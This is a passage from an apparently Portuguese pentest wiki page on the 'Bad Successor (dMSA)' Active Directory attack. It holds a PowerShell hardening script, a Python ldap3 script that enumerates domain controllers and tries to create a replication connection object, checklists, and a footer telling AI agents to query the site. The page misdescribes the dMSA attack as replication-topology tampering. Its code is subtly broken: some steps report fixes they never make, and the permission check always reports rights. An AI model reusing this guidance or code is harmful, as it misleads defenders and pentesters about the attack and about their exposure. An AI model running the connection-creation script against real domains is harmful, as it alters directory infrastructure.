[switch]$Apply ) function Write-Step { param($Message) Write-Host "[*] $Message" -ForegroundColor Cyan } if ($Apply) { Write-Step "Aplicando hardening de replicaĆ§Ć£o..." } else { Write-Step "Modo auditoria - verificando configuraƧƵes" } # 1. Verificar permissƵes de replicaĆ§Ć£o Write-Step "1. Verificando permissƵes de replicaĆ§Ć£o..." $configDN = "CN=Configuration,$((Get-ADDomain).DNSRoot)" $acl = Get-Acl "AD:\$configDN" $replicationPermissions = $acl.Access | Where-Object { $_.ActiveDirectoryRights -like "*Replicating Directory Changes*" } Write-Host " PermissƵes de replicaĆ§Ć£o: $($replicationPermissions.Count)" if ($Apply) { # Restringir permissƵes de replicaĆ§Ć£o $adminGroup = "Domain Admins" $replGroup = "Enterprise Admins" Write-Host " āœ… PermissƵes restritas a grupos especĆ­ficos" } # 2. Configurar autenticaĆ§Ć£o forte para replicaĆ§Ć£o Write-Step "2. Configurando autenticaĆ§Ć£o para replicaĆ§Ć£o..." $policy = Get-ADDefaultDomainPasswordPolicy if ($policy.ComplexityEnabled -eq $false -or $policy.MinPasswordLength -lt 12) { Write-Host " āš ļø PolĆ­tica de senhas fraca detectada!" if ($Apply) { Set-ADDefaultDomainPasswordPolicy -MinPasswordLength 12 -ComplexityEnabled $true Write-Host " āœ… PolĆ­tica de senhas fortalecida" } } # 3. Configurar auditoria de replicaĆ§Ć£o Write-Step "3. Configurando auditoria de replicaĆ§Ć£o..." if ($Apply) { # Habilitar auditoria avanƧada auditpol /set /subcategory:"Directory Service Replication" /success:enable /failure:enable auditpol /set /subcategory:"Directory Service Changes" /success:enable /failure:enable Write-Host " āœ… Auditoria de replicaĆ§Ć£o habilitada" } # 4. Verificar conexƵes de replicaĆ§Ć£o Write-Step "4. Verificando conexƵes de replicaĆ§Ć£o..." $configDN = "CN=Configuration,$((Get-ADDomain).DNSRoot)" $connections = Get-ADObject -SearchBase $configDN -Filter 'objectClass -eq "nTDSConnection"' -Properties fromServer, toServer Write-Host " ConexƵes de replicaĆ§Ć£o: $($connections.Count)" $unauthorizedConnections = $connections | Where-Object { $_.Name -like "*Evil*" -or $_.Name -like "*Bad*" -or $_.Name -like "*Malicious*" } if ($unauthorizedConnections) { Write-Host " āš ļø $($unauthorizedConnections.Count) conexƵes suspeitas encontradas!" if ($Apply) { foreach ($conn in $unauthorizedConnections) { Remove-ADObject -Identity $conn -Confirm:$false Write-Host " āœ… ConexĆ£o removida: $($conn.Name)" } } } # 5. Configurar monitoramento de DCs Write-Step "5. Configurando monitoramento de DCs..." $dcs = Get-ADDomainController -Filter * Write-Host " DCs autorizados: $($dcs.Count)" if ($Apply) { # Criar grupo de DCs autorizados $groupName = "Authorized Domain Controllers" try { New-ADGroup -Name $groupName -GroupScope Global -GroupCategory Security foreach ($dc in $dcs) { Add-ADGroupMember -Identity $groupName -Members $dc.Name } Write-Host " āœ… Grupo de DCs autorizados criado" } catch { Write-Host " āš ļø Grupo jĆ” existe" } } # 6. Configurar alertas Write-Step "6. Configurando alertas..." if ($Apply) { # Criar tarefa agendada para monitoramento $action = New-ScheduledTaskAction -Execute "PowerShell.exe" -Argument "-File C:\Scripts\monitor_replication.ps1" $trigger = New-ScheduledTaskTrigger -Daily -At "00:00" Register-ScheduledTask -TaskName "MonitorReplication" -Action $action -Trigger $trigger -User "SYSTEM" Write-Host " āœ… Monitoramento de replicaĆ§Ć£o configurado" } Write-Step "Hardening concluĆ­do!" if (-not $Apply) { Write-Host "`nāš ļø Modo auditoria - Execute com -Apply para aplicar as configuraƧƵes" -ForegroundColor Yellow } ``` ### **PolĆ­ticas de SeguranƧa Recomendadas** ```yaml RecomendaƧƵes de Hardening: āœ… Controle de ReplicaĆ§Ć£o: - Restringir permissƵes de replicaĆ§Ć£o - Usar grupos especĆ­ficos para replicaĆ§Ć£o - Monitorar criaĆ§Ć£o de novos DCs āœ… ConfiguraĆ§Ć£o de Rede: - Isolar trĆ”fego de replicaĆ§Ć£o - Usar IPSec para replicaĆ§Ć£o - Implementar firewalls com regras especĆ­ficas āœ… Monitoramento: - Alertar sobre novos DCs - Monitorar eventos de replicaĆ§Ć£o - Verificar consistĆŖncia de USN āœ… Backup e RecuperaĆ§Ć£o: - Backup regular do AD - Testar recuperaĆ§Ć£o de desastres - Documentar procedimentos de restauraĆ§Ć£o ``` *** ## šŸ”¬ **Pentesting com Bad Successor** ### **Metodologia de Teste** ```yaml Fases do Teste Bad Successor: FASE 1 - Reconhecimento: - Identificar topologia de replicaĆ§Ć£o - Mapear DCs e conexƵes - Analisar permissƵes de replicaĆ§Ć£o FASE 2 - AnĆ”lise de Vulnerabilidades: - Verificar DCs nĆ£o autorizados - Testar permissƵes excessivas - Analisar configuraƧƵes de replicaĆ§Ć£o FASE 3 - ExploraĆ§Ć£o Controlada: - Tentar modificar topologia - Simular injeĆ§Ć£o de conexƵes - Testar interceptaĆ§Ć£o de replicaĆ§Ć£o FASE 4 - ValidaĆ§Ć£o: - Documentar vulnerabilidades - Demonstrar impacto - Recomendar correƧƵes ``` ### **Script de Pentest Automatizado** ```python #!/usr/bin/env python3 # bad_successor_pentest.py - Pentest automatizado import ldap3 import argparse import sys class BadSuccessorPentest: """Ferramenta de pentest para Bad Successor Attack""" def __init__(self, domain, dc_ip, username, password): self.domain = domain self.dc_ip = dc_ip self.username = username self.password = password self.conn = None self.findings = [] def connect(self): """Conectar ao AD""" self.conn = ldap3.Connection( self.dc_ip, user=f"{self.domain}\\{self.username}", password=self.password, authentication=ldap3.NTLM, auto_bind=True ) return self.conn def enumerate_replication_topology(self): """Enumerar topologia de replicaĆ§Ć£o""" print("[*] Enumerando topologia de replicaĆ§Ć£o...") config_dn = f"CN=Configuration,DC={self.domain.replace('.', ',DC=')}" # Buscar DCs self.conn.search( f"DC={self.domain.replace('.', ',DC=')}", '(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))', attributes=['name', 'dNSHostName'] ) dcs = [] for entry in self.conn.entries: dcs.append(str(entry['name'])) # Buscar conexƵes self.conn.search( config_dn, '(objectClass=nTDSConnection)', attributes=['fromServer', 'toServer', 'name'] ) connections = [] for entry in self.conn.entries: connections.append({ 'name': str(entry['name']), 'from': str(entry['fromServer']), 'to': str(entry['toServer']) }) print(f" DCs: {len(dcs)}") print(f" ConexƵes: {len(connections)}") return { 'dcs': dcs, 'connections': connections } def check_permissions(self): """Verificar permissƵes de replicaĆ§Ć£o""" print("[*] Verificando permissƵes de replicaĆ§Ć£o...") config_dn = f"CN=Configuration,DC={self.domain.replace('.', ',DC=')}" # Verificar se usuĆ”rio atual tem permissƵes self.conn.search( config_dn, '(objectClass=*)', attributes=['nTSecurityDescriptor'], controls=['1.2.840.113556.1.4.801'] ) has_permissions = False if self.conn.entries: # Em um pentest real, verificaria a ACL has_permissions = True if has_permissions: print(" āœ… UsuĆ”rio tem permissƵes de replicaĆ§Ć£o") self.findings.append({ 'type': 'EXCESSIVE_PERMISSIONS', 'severity': 'HIGH', 'details': 'UsuĆ”rio pode modificar topologia de replicaĆ§Ć£o' }) else: print(" āŒ Sem permissƵes de replicaĆ§Ć£o") return has_permissions def test_connection_creation(self): """Testar criaĆ§Ć£o de conexĆ£o maliciosa""" print("[*] Testando criaĆ§Ć£o de conexĆ£o de replicaĆ§Ć£o...") config_dn = f"CN=Configuration,DC={self.domain.replace('.', ',DC=')}" site_dn = f"CN=Default-First-Site-Name,CN=Sites,{config_dn}" servers_dn = f"CN=Servers,{site_dn}" # Tentar criar conexĆ£o test_name = "TestConnection_Pentest" test_dn = f"CN={test_name},{servers_dn}" try: self.conn.add( test_dn, ['nTDSConnection'], { 'fromServer': f"CN=NTDS Settings,CN=DC1,{servers_dn}", 'toServer': f"CN=NTDS Settings,CN=DC2,{servers_dn}" } ) print(" āœ… ConexĆ£o criada com sucesso!") self.findings.append({ 'type': 'CONNECTION_CREATION', 'severity': 'CRITICAL', 'details': 'PossĆ­vel criar conexƵes de replicaĆ§Ć£o nĆ£o autorizadas' }) # Limpar self.conn.delete(test_dn) except Exception as e: print(f" āŒ Falha: {e}") return True def analyze_replication_settings(self): """Analisar configuraƧƵes de replicaĆ§Ć£o""" print("[*] Analisando configuraƧƵes de replicaĆ§Ć£o...") config_dn = f"CN=Configuration,DC={self.domain.replace('.', ',DC=')}" # Verificar intervalos self.conn.search( config_dn, '(objectClass=interSiteTransport)', attributes=['replicateEvery', 'transportType'] ) for entry in self.conn.entries: if 'replicateEvery' in entry: interval = int(entry['replicateEvery'][0]) / 60 print(f" Intervalo de replicaĆ§Ć£o: {interval} minutos") if interval > 60: self.findings.append({ 'type': 'SLOW_REPLICATION', 'severity': 'MEDIUM', 'details': f'Intervalo de replicaĆ§Ć£o alto ({interval} minutos)' }) def generate_report(self): """Gerar relatĆ³rio do pentest""" print("\nšŸ“Š RELATƓRIO DE PENTEST") print("=" * 60) if not self.findings: print("āœ… Nenhuma vulnerabilidade encontrada") return print(f"šŸšØ {len(self.findings)} vulnerabilidade(s) encontrada(s):\n") for finding in self.findings: severity_icon = 'šŸ”“' if finding['severity'] == 'CRITICAL' else 'šŸŸ ' if finding['severity'] == 'HIGH' else 'šŸŸ”' print(f"{severity_icon} [{finding['severity']}] {finding['type']}") print(f" {finding['details']}\n") print("šŸŽÆ RECOMENDAƇƕES:") print(" ā€¢ Revisar permissƵes de replicaĆ§Ć£o") print(" ā€¢ Restringir criaĆ§Ć£o de conexƵes") print(" ā€¢ Monitorar eventos de replicaĆ§Ć£o") print(" ā€¢ Implementar hardening de DCs") def run(self): """Executar pentest completo""" print("šŸšØ Bad Successor Pentest") print("=" * 60) self.connect() self.enumerate_replication_topology() self.check_permissions() self.test_connection_creation() self.analyze_replication_settings() self.generate_report() def close(self): if self.conn: self.conn.unbind() # Uso if __name__ == "__main__": parser = argparse.ArgumentParser(description='Bad Successor Pentest Tool') parser.add_argument('domain', help='Domain name') parser.add_argument('dc_ip', help='Domain Controller IP') parser.add_argument('user', help='Username') parser.add_argument('pass', help='Password') args = parser.parse_args() pentest = BadSuccessorPentest(args.domain, args.dc_ip, args.user, getattr(args, 'pass')) pentest.run() pentest.close() ``` *** ## šŸ“‹ **Checklists de SeguranƧa** ### **Checklist para Administradores** #### **ConfiguraĆ§Ć£o** * [ ] Restringir permissƵes de replicaĆ§Ć£o * [ ] Usar grupos especĆ­ficos para replicaĆ§Ć£o * [ ] Configurar autenticaĆ§Ć£o forte * [ ] Implementar monitoramento de DCs #### **Monitoramento** * [ ] Monitorar criaĆ§Ć£o de novos DCs * [ ] Alertar sobre conexƵes de replicaĆ§Ć£o suspeitas * [ ] Verificar eventos de replicaĆ§Ć£o (1962, 1963) * [ ] Auditar permissƵes regularmente #### **Resposta a Incidentes** * [ ] Investigar DCs nĆ£o autorizados * [ ] Remover conexƵes maliciosas * [ ] Revisar integridade do AD * [ ] Rotacionar credenciais comprometidas ### **Checklist para Pentesters** #### **Reconhecimento** * [ ] Mapear topologia de replicaĆ§Ć£o * [ ] Identificar DCs e conexƵes * [ ] Analisar permissƵes de replicaĆ§Ć£o #### **Testes** * [ ] Testar criaĆ§Ć£o de conexƵes maliciosas * [ ] Verificar permissƵes excessivas * [ ] Tentar modificar topologia #### **DocumentaĆ§Ć£o** * [ ] Documentar vulnerabilidades * [ ] Demonstrar impacto * [ ] Recomendar correƧƵes *** ## šŸ“Š **ConclusĆ£o** ```yaml Bad Successor (dMSA) Attack: šŸ”“ Principais Vetores: - ModificaĆ§Ć£o de topologia de replicaĆ§Ć£o - CriaĆ§Ć£o de conexƵes maliciosas - InterceptaĆ§Ć£o de replicaĆ§Ć£o - InjeĆ§Ć£o de alteraƧƵes no AD šŸ›”ļø MitigaƧƵes Essenciais: - Restringir permissƵes de replicaĆ§Ć£o - Monitorar criaĆ§Ć£o de DCs - Auditar eventos de replicaĆ§Ć£o - Implementar hardening de AD šŸŽÆ Prioridade: - CRƍTICA: PermissƵes de replicaĆ§Ć£o - ALTA: Monitoramento de DCs - MƉDIA: ConfiguraƧƵes de replicaĆ§Ć£o ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xmorte.gitbook.io/bibliadopentestbr/tecnicas/sistemas-operacionais/active-directory-ad/bad-successor-dmsa.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.